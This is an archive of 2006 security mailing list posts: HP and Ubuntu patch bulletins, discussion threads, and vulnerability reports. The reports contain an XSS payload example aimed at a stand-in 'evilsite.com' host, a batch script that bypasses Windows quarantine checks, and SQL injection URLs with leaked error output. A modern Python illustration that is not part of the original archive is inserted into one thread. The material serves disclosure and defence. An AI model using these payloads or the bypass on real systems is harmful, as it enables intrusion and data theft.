[security bulletin] HPSBMA02098 SSRT5911 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Privileged Access, Arbitrary Command Execution, Arbitrary File Creation

2006-05-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00672314

Version: 1

HPSBMA02098 SSRT5911 rev.1 - HP OpenView Network Node Manager (OV NNM) 
Remote Unauthorized Privileged Access, Arbitrary Command Execution, 
Arbitrary File Creation

NOTICE: The information in this Security Bulletin should be acted upon 
as soon as possible.

Release Date: 2006-05-22
Last Updated: 2006-05-22

Potential Security Impact: Remote unauthorized privileged access, arbitrary 
command execution, arbitrary file creation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP OpenView Network Node 
Manager (OV NNM). These vulnerabilities could be exploited remotely by an 
unauthorized user to gain privileged access, execute arbitrary commands, or 
create arbitrary files.

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) 6.20, 6.4x, 7.01, 7.50 running on
HP-UX B.11.00, B.11.11, and B.11.23, Solaris, Windows NT, Windows 2000,
Windows XP, and Linux.

BACKGROUND


The Hewlett-Packard Company thanks NGSSoftware for reporting these 
vulnerabilities to [EMAIL PROTECTED].

To determine if a system has an affected version,
search the output of "swlist -a revision -l fileset" for one of
the filesets listed below. For affected systems verify that the
recommended action has been taken.

AFFECTED VERSIONS

For HP-UX OV NNM 7.50
HP-UX B.11.23 (IA)
=
OVNNMgr.OVNNM-RUN
action: install PHSS_34099 or subsequent

HP-UX B.11.23
HP-UX B.11.11
HP-UX B.11.00
=
OVNNMgr.OVNNM-RUN
action: install PHSS_34098 or subsequent

For HP-UX OV NNM 7.01
HP-UX B.11.00
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN
action: install PHSS_33842 or subsequent

For HP-UX OV NNM 6.4x
HP-UX B.11.00
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN
action: install PHSS_34202 or subsequent

For HP-UX OV NNM 6.20
HP-UX B.11.00
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN
action: install PHSS_34008 or subsequent

For Solaris OV NNM 7.50
SunOS 5.6
SunOS 5.7
SunOS 5.8
SunOS 5.9
=
action: install PSOV_03436 or subsequent

For Solaris OV NNM 7.01
SunOS 5.6
SunOS 5.7
SunOS 5.8
SunOS 5.9
=
action: install PSOV_03430 or subsequent

For Solaris OV NNM 6.4x
SunOS 5.6
SunOS 5.7
SunOS 5.8
SunOS 5.9
=
action: install PSOV_03437 or subsequent

For Solaris OV NNM 6.20
SunOS 5.6
SunOS 5.7
SunOS 5.8
SunOS 5.9
=
action: install PSOV_03434 or subsequent

For Windows OV NNM 7.50
Windows NT
Windows 2000
Windows XP
=
action: install NNM_01115 or subsequent

For Windows OV NNM 7.01
Windows NT
Windows 2000
Windows XP
=
action: install NNM_01110 or subsequent

For Windows OV NNM 6.4x
Windows NT
Windows 2000
Windows XP
=
action: install NNM_01116 or subsequent

For Windows OV NNM 6.20
Windows NT
Windows 2000
Windows XP
=
action: install NNM_01113 or subsequent

For Linux OV NNM 7.50
Linux RedHatAS2.1
=
action: install LSOV_00026 or subsequent

END AFFECTED VERSIONS
RESOLUTION

HP has provided the following patches to resolve this potential vulnerability.
These patches are available from http://support.openview.hp.com/patches/

NNM 7.50

HP-UX B.11.23 (IA)   - PHSS_34099 or subsequent
HP-UX B.11.23 - PHSS_34098 or subsequent
HP-UX B.11.11 - PHSS_34098 or subsequent
HP-UX B.11.00 - PHSS_34098 or subsequent
Linux RedHatAS2.1 - LSOV_00026 or subsequent
Solaris - PSOV_03436 or subsequent
Windows - NNM_01115 or subsequent


NNM 7.01

HP-UX B.11.11 - PHSS_33842 or subsequent
HP-UX B.11.00 - PHSS_33842 or subsequent
Solaris - PSOV_03430 or subsequent
Windows - NNM_01110 or subsequent


NNM 6.4x

HP-UX B.11.11 - PHSS_34202 or subsequent
HP-UX B.11.00 - PHSS_34202 or subsequent
Solaris - PSOV_03437 or subsequent
Windows - NNM_01116 or subsequent


NNM 6.20

HP-UX B.11.11 - PHSS_34008 or subsequent
HP-UX B.11.00 - PHSS_34008 or subsequent
Solaris - PSOV_03434 or subsequent
Windows - NNM_01113 or subsequent



MANUAL ACTIONS: Non-HP-UX only
Install the patches listed in the Resolution section for Solaris, Windows NT,
Windows 2000, Windows XP, and Linux.

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do? 
productNumber=B6834AA


HISTORY
Version:1 (rev.1) - 22 May 2006 Initial release


Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
info

[security bulletin] HPSBMA02121 SSRT061157 rev.1 - HP OpenView Storage Data Protector Remote Arbitrary Command Execution

2006-05-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00671912
Version: 1

HPSBMA02121 SSRT061157 rev.1 - HP OpenView Storage Data Protector Remote 
Arbitrary Command Execution

NOTICE: The information in this Security Bulletin should be acted upon 
as soon as possible.

Release Date: 2006-05-22
Last Updated: 2006-05-22

Potential Security Impact: Remote arbitrary command execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Storage 
Data Protector running on HP-UX, IBM AIX, Linux, Microsoft Windows, and Solaris. 
This vulnerability could allow a remote unauthorized user to execute arbitrary 
commands.

References: None
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP OpenView Storage Data Protector 5.1 and 5.5 running on HP-UX, IBM AIX, 
Linux, Microsoft Windows, and Solaris.

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for one of the filesets listed below. For 
affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

For HP OpenView Storage Data Protector 5.1
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
HP-UX B.11.00
==
DATA-PROTECTOR.OMNI-CORE
action: install inet file per instructions in SSPUX510_091.txt

For HP OpenView Storage Data Protector 5.5
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
HP-UX B.11.00
==
DATA-PROTECTOR.OMNI-CORE
action: install inet file per instructions in SSPUX550_108.txt

END AFFECTED VERSIONS
RESOLUTION

HP has made the following software updates available to resolve the issue.
The software updates can be downloaded via ftp from:

System: hprc.external.hp.com (192.170.19.100)
Login: ss061157
Password: ss061157 (NOTE: CASE-sensitive)

ftp://ss061157:[EMAIL PROTECTED]/
ftp://ss061157:[EMAIL PROTECTED]/

HP OpenView Storage Data Protector 5.1 for HP-UX, IBM AIX, and Linux
SSPUX510_091.shar
md5 sum: 4d3c046c57c0d1d5e157ad669d5a7fcd
cksum: 1130317700 1579112

HP OpenView Storage Data Protector 5.1 for Solaris
SSPSOL510_017.shar
md5 sum: baf1abe0c6a3d94746e0ba5eaa6cfee0
cksum: 193646770 270279

HP OpenView Storage Data Protector 5.1 for Windows
SSPNT510_080.exe
md5 sum: 60cd226ccad50a7eb88ce8cd1962e141
cksum: 4116776482 883301

SSPNT510_080.txt
md5 sum: 4235f1c22b2964e38c3ff9d868c6bc8e
cksum: 3751212316 1845

HP OpenView Storage Data Protector 5.5 for HP-UX, IBM AIX, and Linux
SSPUX550_108.shar
md5 sum: 3ebe295708b80a50425e7eff06f65c52
cksum: 2124891781 1576372

HP OpenView Storage Data Protector 5.5 for Solaris
SSPSOL550_030.shar
md5 sum: 0f9a9e8c2308dd0d067e50e9d0f9cef4
cksum: 794649287 304745

HP OpenView Storage Data Protector 5.5 for Windows
SSPNT550_110.exe
md5 sum: 978425b36b2964fecc841b0366b95b83
cksum: 2226993465 931601

SSPNT550_110.txt
md5 sum: 2fb38e4db600380235cb02edc4b0774e
cksum: 827860573 1847

The installation instructions are in the 'txt' files. For HP-UX, IBM AIX, 
Linux, and Solaris the 'txt' files are contained in the 'shar' files.

The 'shar' files are stored on the ftp site in gzip format:
SSPUX510_091.shar.gz
SSPUX550_108.shar.gz
SSPSOL510_017.shar.gz
SSPSOL550_030.shar.gz

The files listed above will be available from the ftp site for sixty days after 
the initial release of this Security Bulletin. After that the files can be 
obtained by contacting HP Support.

MANUAL ACTIONS: Yes - NonUpdate
Download and install the files as discussed in the Resolution section.

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do? 
productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 22 May 2006 Initial release


Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an

[USN-285-1] awstats vulnerability

2006-05-23 Thread Martin Pitt
===
Ubuntu Security Notice USN-285-1   May 23, 2006
awstats vulnerability
CVE-2006-2237
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

awstats

The problem can be corrected by upgrading the affected package to
version 6.3-1ubuntu0.2 (for Ubuntu 5.04), or 6.4-1ubuntu1.1 (for
Ubuntu 5.10).  In general, a standard system upgrade is sufficient to
effect the necessary changes.

Details follow:

AWStats did not properly sanitize the 'migrate' CGI parameter.  If the
update of the stats via web front-end is allowed, a remote attacker
could execute arbitrary commands on the server with the privileges of
the AWStats server.

This does not affect AWStats installations which only build static
pages.

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2.diff.gz
  Size/MD5:25306 1f013ca8aaad65d8f3ae148e194b3551

http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2.dsc
  Size/MD5:  595 46a103a327e1f1bad3876927c7e66198

http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3.orig.tar.gz
  Size/MD5:   938794 edb73007530a5800d53b9f1f90c88053

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2_all.deb
  Size/MD5:   726430 728ee50f468a4cf3693a32b98c94b455

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1.diff.gz
  Size/MD5:18541 e186b842fbd2d4d97b65eacf7c9c1295

http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1.dsc
  Size/MD5:  595 c5784c2c1bfa002abbfa77d936bc2da5

http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4.orig.tar.gz
  Size/MD5:   918435 056e6fb0c7351b17fe5bbbe0aa1297b1

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1_all.deb
  Size/MD5:   728490 60ca39a436e3a21a838560db5d8a5f3b


signature.asc
Description: Digital signature


DGbook v1.0 - XSS

2006-05-23 Thread luny
DGbook v1.0 - XSS


Homepage:

http://www.diangemilang.com/dgscripts.php


Description:

This is a Guestbook script, written in PHP by Dian Gemilang. Features: Field 
validation, Limit character, Character filtering - This feature will remove "<" 
and ">" characters, so users can't input HTML tags -, Auto Focus - This feature 
will put the user's cursor on the first form field - It's easy to install. Requires 
PHP, MySQL and phpMyAdmin to dump the database. 


Affected files:

Name, homepage, and address input boxes on index.php


XSS Vuln:


< and > may be filtered however, they are not filtered in the name, homepage 
and address text boxes. Only in the comment box.


Example of putting html code in the name & address box:

http://www.evilsite.com'))">


Re: How secure is software X?

2006-05-23 Thread Crispin Cowan
Fabian Becker wrote:
> in my opinion a software can either be secure or not secure. 
> I think it's a bit like a woman cannot be "a bit pregnant".
>   
The problem with this view is that it ignores both time and differential
knowledge: who knows something, and when do they know it?

While it is true that a given block of bits is either vulnerable (has
one or more exploitable defects) or secure (has zero exploitable
defects) this is only relevant in the case of perfect omniscience: you
know absolutely everything about that instance of the software.

But knowing everything is improbable. Software is complex, and there
likely isn't enough time to explore all possible angles of attack. A
trivial counter-example is printf format string attacks: they were
unknown prior to 2000, when the attack class was disclosed, and then
there were zillions of fresh vulnerabilities.

So a discussion of relative vulnerability certainly is relevant to the
practical world. Relative vulnerability is the question "what is the
*work factor* of finding a vulnerability in this piece of software?" A
program that shows vulnerabilities 10 seconds into a fuzz scan is
extremely vulnerable. A program that shows no vulnerabilities after
months or years of scrutiny (qmail & postfix) is highly secure, even
though it is probable that it contains *some* vulnerability.

My Sardonix project has been mentioned in this thread. Sardonix
attempted to measure the security of programs based on a record of the
skills of people who had audited it, and conversely measured the
auditors based on the programs they had audited vs. the quality of their
audits. Sardonix failed due to lack of participation, likely because it
asked far too much from the auditors.

What is needed for a more successful project is a lighter-weight way to
record who has audited a program. The standard that Litchfield proposed
could become that: similar to CDDB, it would just log who has audited
the program, and users can make whatever they want of that record.

Crispin
-- 
Crispin Cowan, Ph.D.  http://crispincowan.com/~crispin/
Director of Software Engineering, Novell  http://novell.com



RE: Circumventing quarantine control in Windows 2003 and ISA 2004

2006-05-23 Thread Roger A. Grimes
This is something that has been reported to Microsoft many, many times
for nearly two years (at least the NAQC issue, including by me), and
yes, their response is the same as you have reported. The real answer is
not to use it if it doesn't meet your needs. There is no better vote
than with dollars.

Another solution is to build a better authentication/authorization
mechanism than a simple string, say something along a challenge-response
solution with a timestamp. It can be done, it's only unfortunate that it
takes much additional programming on both the client-side checks and the
authentication/authorization response. 

Personally, I think it is one of the most unfriendly NAC/NAP products
out there. Hard to configure, requires RRAS (although not IAS as most
people think), requires non-legacy Windows clients, and has many
security gaps. The next version will be better, but I find it hard to
believe it will be better than all the other solutions I can plug in and
get running in under an hour across a wide spectrum of clients (e.g.
Verniers EdgeWall, StillSecure, etc.).

I've covered many network access control solutions for InfoWorld, and we
are doing some more product reviews soon. I encourage anyone interested
in network access control solutions to search on a few of these products
on www.infoworld.com, to see the good and the bad of each, before buying
one. None are perfect, but there are certainly a few solutions that are
far ahead of the game in terms of ease-of-use, platform support,
protocol support, and security.

To Microsoft's credit, NAQC is free (currently...there may be an
additional license fee in the future) with Server 2003, so it's a free
option for many administrators, who only need what it has.  If anyone is
interested in how to configure NAQC, just send me an email and I'll send
you step-by-step slides.

Roger

*
*Roger A. Grimes, InfoWorld, Security Columnist 
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*email: [EMAIL PROTECTED] or [EMAIL PROTECTED]
*Author of Professional Windows Desktop and Server Hardening (Wrox)
*http://www.amazon.com/gp/product/0764599909
*



-Original Message-
From: Memet Anwar [mailto:[EMAIL PROTECTED] 
Sent: Thursday, May 18, 2006 5:50 AM
To: bugtraq@securityfocus.com
Subject: Circumventing quarantine control in Windows 2003 and ISA 2004

For those unfamiliar with MS quarantine control, you can read Jon
Hassel's tutorial on Windows 2003 Network Access Quarantine Control
(NAQC) [http://www.securityfocus.com/infocus/1794], and the ISA 2004 VPN
Quarantine
(ISAQ) feature [http://www.securityfocus.com/infocus/1799].

A simplistic mechanism used in both NAQC and ISAQ enables users to bypass
the requirements set by administrators (such as XP must run SP2, should
have the latest virus definitions, etc.). The problem is due to how the
requirements are validated: it is trivial for users to trick RRAS/ISA into
believing that the client's system is always aligned with the requirements,
regardless of the actual condition.

To illustrate my point, I will use Jon's article part-1 mentioned above,
because it is much the same with Microsoft description on the subject
that I see on MOC-2824B training material. Please refer to 'A
Step-by-Step Overview of NAQC'-part of the article.

There, steps 1-7 will put the client connection into quarantine mode,
which is fine. Steps 8-9 show that the CMAK profile will execute a
client-side script to validate the client's configuration against the
preconfigured baseline. If the client meets the requirements, the script
should call rqc.exe with the appropriate parameters. In steps 10-14, rqc.exe
on the client sends its result status to rqs.exe (the listener) on the
server, along with its script version string. The listener then compares
the script version string with its reference, before reconfiguring the
session to normal access.

Now I see two weaknesses there.

First, it is trivial for users to ensure that rqc.exe will always report
success back to rqs.exe, regardless of the actual condition of their
system. The script (or any executable used) can be modified or replaced,
and it will always work as long as the replacement knows what parameters
must be obtained from CMAK, and what should be passed to rqc.exe.

Second, in step 12, rqs.exe only performs a string comparison of the
script version to verify whether the correct script is in use by the client.

For example, if the admin-supplied script is a .cmd file, a user can
replace the content with something like the following. Note that .vbs or
.exe files can also be replaced, as long as the same functionality is
provided.

  @echo off
  @rem Use %ServiceDir% to locate rqc.exe.
  SET RQCLOC=%1\rqc.exe
  SET REMOVAL=get_this_from_the_orig_script
  %RQCLOC% %2 %3 7250 %4 %5 %REMOVAL%

I've reported this issue to MSRC as a design flaw that could allow what
they call 'ungrante
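As an added illustration (not code from either poster, nor Microsoft's rqc.exe/rqs.exe), the following Python models the two checks discussed in this thread: the static version-string comparison Memet describes, and a challenge-response with a timestamp of the kind Roger suggests. The message layout, window size and function names are assumptions made for this example; the shared key is constructed.

```python
# Added illustration, not code from the thread or from Microsoft's NAQC.
# `static_version_check` stands in for rqs.exe comparing the script-version
# string; `ChallengeVerifier` is one way to do challenge-response with a
# timestamp. Layout of the signed message and the 30-second window are assumed.
import hashlib
import hmac
import secrets
import time

MAX_AGE_SECONDS = 30  # assumed policy: how long an issued challenge stays valid


def static_version_check(reported_version: str, expected_version: str) -> bool:
    """The weak check: any client that knows the expected string passes,
    whether or not the health script actually ran."""
    return reported_version == expected_version


def response_tag(key: bytes, nonce: str, timestamp: int, status: str) -> str:
    """HMAC over the server's nonce, the client's timestamp and its status.
    Without the key a client cannot mint a tag for a nonce it was just handed."""
    message = f"{nonce}|{timestamp}|{status}".encode()
    return hmac.new(key, message, hashlib.sha256).hexdigest()


class ChallengeVerifier:
    """Server side: hands out single-use nonces and checks the signed reply.
    Limitation (Roger's point): this binds the reply to the server, not to the
    true client state; a client that holds the key can still lie about status."""

    def __init__(self, key: bytes, clock=time.time):
        self._key = key
        self._clock = clock  # injectable so the demo is deterministic
        self._outstanding: dict[str, int] = {}

    def issue_challenge(self) -> str:
        nonce = secrets.token_hex(16)
        self._outstanding[nonce] = int(self._clock())
        return nonce

    def verify(self, nonce: str, timestamp: int, status: str, tag: str) -> bool:
        issued_at = self._outstanding.pop(nonce, None)  # single use
        if issued_at is None:
            return False  # never issued, or already consumed (replay)
        now = int(self._clock())
        if now - issued_at > MAX_AGE_SECONDS:
            return False  # reply arrived after the window closed
        if not issued_at <= timestamp <= issued_at + MAX_AGE_SECONDS:
            return False  # client timestamp not plausible for this challenge
        if status != "compliant":
            return False
        expected = response_tag(self._key, nonce, timestamp, status)
        return hmac.compare_digest(expected, tag)


def demo() -> dict:
    """Run the four scenarios and report each outcome."""
    clock = [1_000_000]  # constructed fake clock, advanced by hand
    key = b"constructed-shared-secret-not-a-real-key"
    verifier = ChallengeVerifier(key, clock=lambda: clock[0])
    results = {}

    # 1. Static string: a replacement script that merely echoes the version passes.
    results["static_forged_passes"] = static_version_check("v1.0-constructed", "v1.0-constructed")

    # 2. Honest client answers the challenge it was given.
    nonce = verifier.issue_challenge()
    ts = clock[0]
    tag = response_tag(key, nonce, ts, "compliant")
    results["fresh_ok"] = verifier.verify(nonce, ts, "compliant", tag)

    # 3. Replaying the same captured reply is rejected: the nonce is consumed.
    results["replay_rejected"] = not verifier.verify(nonce, ts, "compliant", tag)

    # 4. Flipping the status under a tag computed for a different status fails.
    nonce2 = verifier.issue_challenge()
    tag2 = response_tag(key, nonce2, clock[0], "noncompliant")
    results["tamper_rejected"] = not verifier.verify(nonce2, clock[0], "compliant", tag2)

    # 5. A reply that arrives after the window has expired is rejected.
    nonce3 = verifier.issue_challenge()
    ts3 = clock[0]
    tag3 = response_tag(key, nonce3, ts3, "compliant")
    clock[0] += MAX_AGE_SECONDS + 1
    results["stale_rejected"] = not verifier.verify(nonce3, ts3, "compliant", tag3)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```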

Re: Sun single-CPU DOS

2006-05-23 Thread Doug Hughes
On Fri, 19 May 2006, Mike O'Connor wrote:

> :single CPU Sun microsystems system running solaris7, 8, or 9
> :(haven't tested on 10). E.g. netra.
> :
> :if you telnet to a local router, disable nagle (on purpose
> :or by accident or whatever - if nagle is turned off), and then
>
> TCP_NODELAY by any other name, I assume.
>
> :ping another device with interpacket delay of 0 and a count
>
> Define what you mean by "interpacket delay".  Are you referring to an
> Ethernet-specific setting, perhaps?  Ethernet's "interpacket gap" is
> really about the gap between Ethernet frames, not IP packets.  Having
> "packet" in the terminology leads people to think it's an IP thing,
> and ranks up there with "collisions" as far as misleading Ethernet
> terminology goes.  Think of it as "interframe gap", or IFG.

cisco router. extending ping. 0 delay.
I was speaking of cisco ping.
I should have said 'timeout'. mea culpa.

>
> For that manner, define "ping".  You're certainly not talking about
> /usr/sbin/ping, but something that spews out TCP, correct?  It sounds
> like you're hitting the Sun system with a TCP ping stream -from- your
> router, correct?

running ping on the cisco to another device (preferably a fast
cisco as the source and a nice fast interface like a gige or
a IP/sonet)

>
> :of somewhere above 100,000 pings, it will effectively
> :DOS the machine you are telneting from.
> :
> :The machine becomes unusable, will not accept break on console.
> :totally hung.
> :
> :After opening a case with Sun on this issue and going back and
> :forth for 9 months, they have decided that I am manufacturing
> :jabber and the appropriate course of action is to remove the
> :offending device (the router in this case) from the network.
>
> If you're talking IFG...
>
> Having an IFG < 96 bittimes (where the wall-clock units for bittimes
> varies as a function of specific ethernet speed) leads to out-of-spec
> Ethernet frames, which could reasonably be parsed as "jabber".  The
> too-short IFG could lead the other node(s) in the ethernet not knowing
> when you've stopped sending any given frame.  In a shared ethernet,
> you can also end up with fun conditions like the "capture effect".

dedicated, switched Ethernet here.
it seems to mostly overwhelm the sun's interrupt processing, but
that's just a theory since Sun has decided that the solution is to
unplug the machine on the other end.

We're only talking about 14000 packets per second to kill a netra
T1. I've been able to drive one faster than that via other means
without causing a 'jabber effect'.

>
> There's no requirement for the networking to that particular interface
> on the Sun to actually work in the face of a too-short IFG or any other
> physical out-of-spec condition.  Now, that doesn't mean the -console-
> should go out to lunch (sounds like you're getting a little too much
> "The Network Is The Computer" :) ), but it's perfectly ok to simply not
> listen or xmit on an ethernet that's chronically out-of-spec.
>
indeed. that's my issue, the console should not be hung. The machine
should not require a hard reset. And, I do not believe there is
an electrical problem. I'm not doing anything down that low, It's
just a TCP/IP stream, and, a not outrageous one at that.


> If Sun were to tweak things so it could detect and log the out-of-spec
> network and react to it by downing the interface, rather than just keep
> listening and accumulating a ton of bogusly-spaced interrupts that bog
> it down, that would seem to be reasonable.  Some Unixes have userspace
> routing daemons that periodically look for network brokenness and will
> ifconfig the interface down. But, if the system is bogged down quickly
> enough that those processes never get a chance to run, such forms
> of mitigation won't work.
>
> Oh as an important side note -- your Sun is set up where it won't hang
> owing to network dependencies if its interface is ifconfig'ed up, but
> the actual network it talks to is offline, right?  Otherwise, you are
> making yourself DoS-prone in a whole lot of ways besides pfutzing with
> out-of-spec ethernets.
>
correct. standalone machine. (even if it were not, there would still
be response on console to, e.g. break)

> :In other words, they refuse to fix the DOS issue under the assertion
> :that it is a physical issue rather than an issue of the OS
> :improperly handling a stream of small TCP packets.
>
> My -suspicion- here is that it's the interrupts that the "stream of
> small TCP packets" generates that is leading to the system hang, but
> it'd take some kernel profiling to understand the specific impact.
> If the only way to generate the particular concentration of network
> interrupts along that ethernet interface involves outright breaking
> the ethernet spec, I can see where Sun rejects this as bogus from a
> -security- perspective.
>
See, that's where I have trouble. From a Security perspective, you'd
want to avoid the DOS via some kind of drop or disable me

[security bulletin] HPSBUX02075 SSRT051074 rev.5 - HP-UX Running xterm Local Unauthorized Access

2006-05-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c0016
Version: 5

HPSBUX02075 SSRT051074 rev.5 - HP-UX Running xterm Local Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon 
as soon as possible.

Release Date: 2005-11-11
Last Updated: 2006-05-19

Potential Security Impact: Local unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running xterm.
The vulnerability could be exploited by a local user to gain unauthorized 
access.

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.

BACKGROUND

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.00
=
X11.X11-RUN-CL
->action: install PHSS_34160 or subsequent

HP-UX B.11.11
=
X11.X11-RUN-CL
action: install PHSS_34102 or subsequent

HP-UX B.11.23
=
X11.X11-RUN-CL
action: install PHSS_34159 or subsequent

END AFFECTED VERSIONS
RESOLUTION

HP has provided the following patches to resolve the issue:

B.11.00 - PHSS_34160 or subsequent
B.11.11 - PHSS_34102 or subsequent
B.11.23 - PHSS_34159 or subsequent

The patches can be downloaded from http://itrc.hp.com

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information: 
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY
Version:1 (rev.1) - 13 November 2005 Initial release
Version:2 (rev.2) - 22 November 2005 Preliminary xterm files are available.
Version:3 (rev.3) - 5 January 2006 B.11.11 patch is available.
Version:4 (rev.4) - 25 April 2006 B.11.23 patch is available.
Version:5 (rev.5) - 22 May 2006 B.11.00 patch is available.

Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular 

Alstrasoft Article Manager Pro v1.6

2006-05-23 Thread luny
Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors


Homepage:

http://www.alstrasoft.com


Description:

Article Manager Pro is the next generation article publishing system designed 
to make your life a whole lot easier by enabling webmasters to publish articles 
or news into their website in a matter of minutes with our advance WYSIWYG 
editor that includes features such as a built-in spell checker, word finder and 
many more. 


Affected files:


profile.php

userarticles.php

submit_article.php 

mraticles.php

admin.php


Exploits & Vulns:



SQL Injection query error

http://www.example.com/article/profile.php?author_id=1'


1064 : You have an error in your SQL syntax. Check the manual that corresponds 
to your MySQL server version for the right syntax to use near '\'' at line 1



SQL Injection:

http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--


Proof Of Concept: 

All articles in the DB appear on the page when the above query is performed.



Full path errors


http://www.example.com/article/userarticles.php?aut_id=3'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in /home/alstraso/public_html/article/functions.php on line 212

Invalid user id supplied!



http://www.example.com/article/mrarticles.php?action=read'

